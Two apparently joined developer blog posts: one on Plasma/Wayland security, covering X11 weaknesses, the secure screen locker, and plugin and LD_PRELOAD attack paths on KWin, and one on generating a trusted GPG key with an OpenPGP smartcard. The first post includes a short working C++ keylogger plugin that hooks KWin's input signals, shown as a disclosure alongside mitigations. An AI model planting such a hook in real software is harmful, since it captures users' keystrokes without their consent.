Looking at the security of Plasma/Wayland

Our beta release of Plasma 5.5 includes a Wayland session file which allows to start in a Plasma on Wayland session directly from a login manager supporting Wayland session. This is a good point in time to look at the security of our Plasma on Wayland session.

Situation on X11

X11 is not secure and has severe conceptual issues like

  • any client connected to the X server (either remote or local) can read all input events
  • any client can get information about when another window rendered and get the content of the window
  • any client can change any X attribute of any other window
  • any window can position itself
  • many more issues

This can be used to create very interesting attacks. It’s one of the reasons why I for example think it’s a very bad idea to start the file manager as root on the same X server. I’m quite certain that if I wanted to I could exploit this relatively easily just through what X provides.

The insecurity of X11 also influenced the security design of applications running on X11. It’s pointless to think about preventing potential attacks if you could get the same by just using core X11 functionality. For example KWin’s scripting functionality allows to interact with the X11 windows. In general one could say that’s dangerous as it allows untrusted code to change aspects of the managed windows, but it’s nothing you could not get with plain X11.

Improvements on Wayland

Wayland removes the threats from the X11 world. The protocols are designed in a secure way. A client cannot in any way interact with windows from other clients. This implies:

  • reading of key events for other windows is not possible
  • getting window content of other windows is not possible

In addition the protocols do not allow to e.g. position windows themselves, or raise themselves, change stacking order and so on.

Security removed in Plasma

But lots of these security restrictions do not work for us in Plasma. Our desktop shell need to be able to get information of other windows (e.g. Tasks applet), be able to mark a panel as a panel (above other windows) and need to be able to position windows itself.

Given that we removed some of the security aspects again and introduced a few custom protocols to provide window management facilities and also to allow Plasma windows to position themselves. At the moment we have no security restrictions on that yet which gives this functionality to all clients.

We will address this in a future release. There are multiple ways how this could be addressed, e.g. using the Wayland security module library or use systemd in some way to restrict access. Overall I think it will require rethinking security on a Linux user session in general, more on that later on.

Security added in Plasma compared to X11

The most important change on the security front of the desktop session is a secure screen locker. With Plasma 5.5 on Wayland we are able to provide that and address some long standing issues from X11. The screen locks even if a context menu is open or anything else grabbing input. The compositor knows that the screen is locked and knows which window is the screen locker. This is a huge change compared to X11: the XServer has no concept of a screen locker. Our compositor can now do the right thing when the screen is locked:

  • don’t render other windows
  • ensure input events are only handled in the lock screen
  • prevent access to screen grabbing functionality while screen is locked

As a matter of fact the Wayland protocol itself doesn’t know anything about screen locking either. This is now something we added directly to KWin and doesn’t need any additional custom Wayland interfaces.

How to break the security?

Now imagine you want to write a key logger in a Plasma/Wayland world. How would you do it? I asked myself this question recently, thought about it, found a possible solution and had a key logger in less than 10 minutes: ouch.

Of course there is no way to get a client to act as a key logger. The Wayland protocol is designed in a secure way and also our protocol additions do not weaken that. So the key to get a key logger is to attack KWin.

So what can an attacker do with KWin if he owns it? Well pretty much anything. KWin internally has a very straight forward trust model: everything is trusted and everything can access anything. There is not much to do about that, this is kind of how binaries work.

For example as a Qt application each loaded plugin has access to the QCoreApplication::instance. From there one could just use Qt’s meta object inspection to e.g. get to the InputRedirection model and connect to the internal signal on each key press:

<code>void ExamplePlugin::installKeyLogger()
{
    const auto children = QCoreApplication::instance()-&gt;children();
    for (auto it = children.begin(); it != children.end(); ++it) {
        const QMetaObject *meta = (*it)-&gt;metaObject();
        if (qstrcmp(meta-&gt;className(), "KWin::InputRedirection") != 0) {
            continue;
        }
        connect(*it, SIGNAL(keyStateChanged(quint32,InputRedirection::KeyboardKeyState)), this, SLOT(keyPressed(quint32)), Qt::DirectConnection);
    }
}

void ExamplePlugin::keyPressed(quint32 key)
{
    qDebug() &lt;&lt; "!!!! Key: " &lt;&lt; key;
}
</code>

But Martin, why don’t you just remove the signal, why should any other aspect of KWin see the key events? Because this is just the example of the most trivial exploit. Of course it’s not the only one. If you have enough time and money you could write more sophisticated ones. For example look at this scenario:

KWin uses logind to open restricted files like the input event files or the DRM node. For this KWin registers as the session controller in logind. Now a binary plugin could just send a DBus call to logind to also open the input event files and read all events. Or open the DRM node and take over rendering from KWin. There is nothing logind could do about it: how should it be able to distinguish a valid from an invalid request coming from KWin?

How to secure again?

As we can see the threat is in loading plugins. So all we need to do is ensure that KWin doesn’t load any plugins from not trusted locations (that is not from any user owned locations). This is easy enough for QML plugins where we have the complete control. In fact it’s easy to ensure for any of KWin’s own plugins. We can restrict the location of all of them.

And even more: by default a system is setup in a way that no binary plugins are loaded from user’s home. So yeah, no problem after all? Well, unfortunately not. During session startup various scripts are sourced which can override the environment variables to influence the loading of plugins. And this allows to also use the well known LD_PRELOAD hack. My naive approach to circumvent this issue didn’t work out at all as I had to learn that already the session startup and the PAM interaction source scripts. So your session might be owned very early.

An approach to black list (unset) env variables is futile. There are too many libraries KWin relies on which in turn load plugins through custom env variables. Most obvious examples are Qt and Mesa. But there are probably many more. If we forget to unset one variable the protection is broken.

A different approach would be to white list some known secure env variables to be passed to KWin. But this also requires that at the point where we want to do the restriction the session is not already completely broken. This in turn means that neither PAM nor the session manager may load any variables into the session before starting the session startup. And that’s unfortunately outside what we can do in our session startup.

So for Plasma 5.5 I think there is nothing we can do to get this secure, which is fine given that the Wayland session is still under development. For Plasma 5.6 we need to rethink the approach completely and that might involve changing the startup overall. We need to have a secure and controlled startup process. Only once KWin is started we can think about sourcing env variables from user locations.

So how big is the threat? By default it’s of course secure. Only if there is already a malicious program running in the system there is a chance of installing a key logger in this way. If one is able to exploit e.g. a browser in a way that it can store an env variable script in one of the locations, you are owned. Or if someone is able to get physical access to your unencrypted hard disk, there is a threat. There are easy workarounds for a user: make all locations from where scripts are sourced during session startup non-writable and non-executable, best change ownership to root and encrypt your home location.

Overall it means that Plasma 5.5 on Wayland is not yet able to provide the security I would have liked to have, but it’s still a huge improvement over X11. And I’m quite certain that we will be able to solve this.

Generating a private key I can trust

Given last weeks news about the state of cryptography and the influence of the NSA on standards I decided to enter paranoid/tinfoil-hat mode. The result is that I do no longer consider my asymmetric keys as long enough. So I need to regenerate them. This should be an easy task, but I’m in paranoid mode.

The big problem is “can I trust my systems to generate a safe key”? I decided no, I cannot. Not without investing some time. Normally I would trust my distribution, but I had once to regenerate my SSH key because they got random numbers wrong:
Random Number by Randall Munroe (Creative Commons Attribution-NonCommercial 2.5 License)

So whom do I actually trust? This list is short: the Linux kernel (Linus tree) and FSF/GNU.

Whom do I not trust? That gets more complicated. First of all I do not trust any hardware. It’s impossible to verify that the hardware doesn’t have a backdoor and randomness looks random even if tampered with.

Of course I do not trust the US and any US-based company or company which has interactions with the US. As we had to learn the NSA is putting backdoors into products of US companies and the companies are not allowed to talk about it. This means I do not trust the Linux kernel of any distribution placed in the US or relations with the US. Obviously I extend this on all distributions of companies based in other spy countries (e.g. Five Eyes). This makes the list rather short.

I also do not trust binaries as there is no way to ensure that the binary reflects the source code of the package[1]. This further reduces the list. I’m basically left with Linux From Scratch or Gentoo – two distributions I do not have any experience with. Or use a binary distribution and create the required packages by myself (Linux kernel, GPG). Obviously there is still the risk of a tampered compiler but I consider this risk as rather academic.

Last but not least I do not trust my systems and myself. If I keep the key on the hard disk the security is basically reduced to the strength of the chosen passphrase. Hard disk encryption can add some security to it, but I prefer to have my system in suspend so the key might be in memory and there is always the risk of cold boot attacks. In summary I do not think that hard disk encryption is a solution for protecting the key. Also there is always the risk of an application attacking the system. Getting passphrase through an X11 keyboard logger is unfortunately trivial.

A solution to this problem is getting the key on an external dedicated device. But this is of course conflicting with my “I do not trust hardware” requirement. If hardware random number generators are involved in creating the keys or doing the encryption this would be problematic.

The requirement would therefore be a hardware device which keeps the key secure but does not generate it and is not involved in the session encryption. Today I ordered an OpenPGP Smartcard. This fulfills most of my requirements. It’s trusted by FSFE (Fellowship card), developed by a company which also develops GnuPG and is Germany based. Still I do not trust hardware, but one can upload an externally created key.

So sometime soon I will blog the public key of my new key pair.

[1] I am aware that bitcoin is experimenting in that direction. But this doesn’t help me with the problem to verify the Linux kernel.